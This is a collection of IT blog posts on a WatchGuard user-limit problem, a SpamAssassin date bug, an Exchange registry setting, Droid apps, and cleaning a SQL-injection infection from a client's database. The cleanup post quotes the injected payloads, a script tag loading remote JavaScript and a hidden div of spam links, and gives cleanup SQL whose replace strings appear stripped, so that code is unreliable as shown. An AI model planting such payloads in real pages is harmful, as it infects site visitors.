Got a call from a client today who was unable to get his laptop to connect to his wireless network.

The client has a standard Linksys WRT54G which is sitting behind a WatchGuard SOHO router.  (The WatchGuard predated my involvement with the client, and we determined it was easier to use the WRT54G as an access point rather than ripping out the WatchGuard...)

Upon inspection, the laptop WAS connecting to the wireless network, it just didn't have internet access.  Vista would show it had Internet connectivity, but it would then just go away.

Upgraded the WRT54g's firmware, same result.  Changed from WEP to WPA-2. Same result.

Reviewed the logs on the WatchGuard and saw "User count exceeded. Packet dropped."

A-HA!

The WatchGuard, unlike most consumer routers, has a user limit to it.  It keeps track of 10 IPs and when IP number 11 hits the routing table, it gets whacked with a big ole' DENY rule.

When I plugged the laptop into the WRT54g via ethernet cable, the IP address was one of the 10 in the routing table and packets were allowed to flow.  The IP address assigned to the wireless interface was not in the table and therefore blocked.

We couldn't figure out why the laptop stopped working.  The client mentioned the laptop stopped working when we put a new computer on the floor.  We did a quick count of all devices on the network and only came up with 7...

Just as I was leaving, one of the warehouse guys came in holding his iPhone asking "Did something happen to the wireless network?"

Of course, something had -- I hadn't changed the Linksys back to WEP after the WPA-2 experiment, and he lost his connection... and the mystery of the additional devices was solved.

So, the moral is two-fold -- look for user licensing restrictions where you least expect them, and someone else's handheld device from home sitting on your network might have a negative impact on your ability to get work done.

Just a quick heads up, but Spam Assassin (which we use for filtering here at Jephens) has a mis-formed filtering rule which considers 2010 to be a "grossly in the future" and therefore can't be a valid date.

This might have been true in Y2K, but in 2010, we're not so gross.

If you use ESVA like we do, there's a simple enough fix which is outlined in the ESVA Forums.

Otherwise, you'll need to fix your local.cf rules or edit the 72_active.cf file.

Further details can be found at Mike Cardwell's blog: SpamAssassin 2010 bug.

Got a call today off our previous article in this series from Branden of Hot Media Group, Inc., aChicago-based web application development, networking, and graphic design firm who found himself with a database full of malware infections, but the characteristics of his attack didn't match what we had written about, so he called us up. We reviewed his symptoms and were able to tweak the code we provided previously to work with this new set of issues.

We weren't able to see how the site was attacked, nor did we worry about how the site would be steeled against future occurrence (always use stored procedures and/or parametrized queries, kids!) -- this was purely a cleanup job.

This is the code we had:

DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
PRINT ('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+'],'''', '''')') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND b.xtype=99 OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN PRINT ('UPDATE ['+@T+'] SET ['+@C+']=cast(replace(cast(['+@C+'] as nvarchar(4000)),'''','''') as ntext)')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

And that worked fine, but it had some shortcomings -- mostly it only stripped out a single bit of invasive code, and our new friend had quite a bit of code to deal with, so instead of the almost quaint looking malware code:

<script src="hxxp://evilsite.evl/b.js"></script>

We had this jumble of code in every ntext field in his database:

<script type='text/javascript' src='http://google-anallytics.bad/urchin.js'></script>
<div style='display:none;'><a href='http://tests4all.bad/1/'>journals on losing post-pregnancy weight</a>
<a href='http://tests4all.bad/2/'>personal trainer certification atlanta</a>
<a href='http://tests4all.bad/3/'>quit smoking water vapor rings</a>
<a href='http://tests4all.bad/4/'>eyes in the darkness</a>
<a href='http://tests4all.bad/5/'>cheated map on dota 6.54b</a>
<a href='http://tests4all.bad/6/'>occupations for bored teen boys</a>
<a href='http://tests4all.bad/7/'>cgw southeast partners ilp</a>
<a href='http://tests4all.bad/8/'>does iq tests accurately measure intelligence</a>
<a href='http://tests4all.bad/9/'>free total psychic reading</a>
<a href='http://tests4all.bad/10/'>minnesota past life regression</a>
<a href='http://tests4all.bad/11/'>date of abraham lincolns death</a>

After trying to figure out the best way to escape all the single quotes, Branden -- an accomplished ColdFusion developer -- suggests "why don't we just drop everything to the right of the <script> tag?"
Read the rest of this entry »

I keep coming up against this, and I keep forgetting it, so I figured I'd write it down here for all of our benefit.

Exchange 2003 allowed us to easily mail enable public folders, so something sent to info@domain.invalid would go to a public folder where any number of staff could monitor the mailbox.

However, by default, the mail is stored in the Public Folder as a NOTE and not an E-MAIL (for the geeks in the audience IPM.POST vs. IPM.NOTE)

To make the public folder store incoming mail as emails, we need to make a quick registry change. This is all outlined in MS KB 817809.

Go to

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MSExchangeIS\<ServerName>\Public-<GUID>

And create (or edit) the key:

Value name: Incoming defaults to IPM.Note
Value type: DWORD
Value data: 1

Setting the value to 1 (true) stores things as IPM.NOTE (which is what we want). Setting the value to 0 sets it back to saving things as a post.

So, I'm not a gigantic app person -- my iPod Touch has the essentials for what I need, a few cutsey show-off things or games for the kids, so I figured I'd do the same with my Droid... yes and no. Here's a rundown of whats on my Droid right now, and what I think:

Alarmed Light - Used it because it has a feature where you're forced to answer math questions to turn the alarm off. Kinda forces you to shake the cobwebs out and get started.

Aloqa - Cool app that uses your GPS to let you know what's around. It's integrated with Yelp for food ratings. It has icons on its main screen for "Hot" (whatever that means), Yelp Restaurants, Coffee, last.fm, Music (showing me concerts in Denmark?!?), Playing Tonight (movies), Yelp Bars & Clubs, Real Estate, Wikipedia, ATMs, Pizza, Aloqa, Yelp Fast Food and then "Add more channels." It more or less does what it is supposed to; it's nice to look at.

BeamReader - a PDF viewer. I should uninstall since I bought "Documents to Go"

Bubble Burst Lite -- Windows Mobile Jawbreaker for the Droid.

ConnectFour - decent enough implementation. AI seems a little stupid sometimes.

Documents to Go - open Word, Excel, Powerpoint, PDF. Does good job at rendering PDFs.

Flashlight - turns your screen white. Doesn't seem to adjust for maximum brightness. Passable.

Flickr Droid - Droid needs a good Flickr app. This isn't it, but the best one I could find that uses the Flickr API to let me at my stuff, since a lot of my photostream is friends/family only.

FlightStats Lite - haven't had a chance to play with this. Will in January as I head to CES.

Goggles - Google's latest toy. Varies from wildly successful to "how did you not recognize the Pepsi logo?!?"

GPS Status - essentially a digital compass. Used when I was troubleshooting GPS on the phone.

Flixter Movies - quick and easy to get to where we have to go for Friday Morning Movie Club.

NYC Bus and Subway Map - not as interactive as I'd like. Literally a HiDef graphic of the map, and you can click thru to the MTA website for further details on the lines.

OpenTable - online restaurant reservations from opentable.com . Decent.

Pandora - works well over 3G, tho I imagine it eats thru the quota pretty quick.

PicSay Lite - dopey photo editing thing. Makes speech baloons. Don't know why I downloaded this.

Poke a Mole - whack-a-mole for the phone. Fun game with a Giant Downside - even when phone is muted annoying background music plays. Have to go into game menu to mute it.

Remote RDP Demo - eventually I'll need to really use function keys when I Remote Desktop into a machine from my phone, but until then, the demo version does the trick.

Robo Defense FREE - I do enjoy the tower defense genre of casual gaming... so why not have it on my phone? (Hardly never play it. Seemed like a good idea.)

Shazam - this app still amazes me. Where did they get that song database???

Stopwatch - straightforward.

Sudoku Free - seeing it in my list makes me feel smart until I play it, thenI feel dumb.

The Weather Channel - it has a widget so I can glance at the home screen to see what it's going to be like... or rather I can look at the home screen and tell my wife what it's going to be like... (I had a weather widget on the Treo and missed it.)

TivoRemote - control the Tivo over WiFi. Nice, especially for text entry. The iPhone's version is better.

TRAFFIC! - A test app for me. Not in love.

Trap! - Another game, but its "draw a line" technology gets in the way of gameplay. Fun when it does what you want.

Tunes Remote - Control iTunes from the Droid. YAY! One of the big reasons I got the iPhone touch was to control the iTunes machine hooked to the outdoor speakers.

Twidroid Pro - From what I understand, the best Twitter client for the Droid. I'm happy with it. Does everything I need, but I am far from a Twitter power user, so some might find it lacking. They constantly update it which seems like they're interested developers.

US Traffic - Another traffic app that I tried before I realized Google Maps had a Traffic layer...

wpToGo - Allows me to post to Wordpress from the phone... tho I have not had the need to do so.

What have I missed?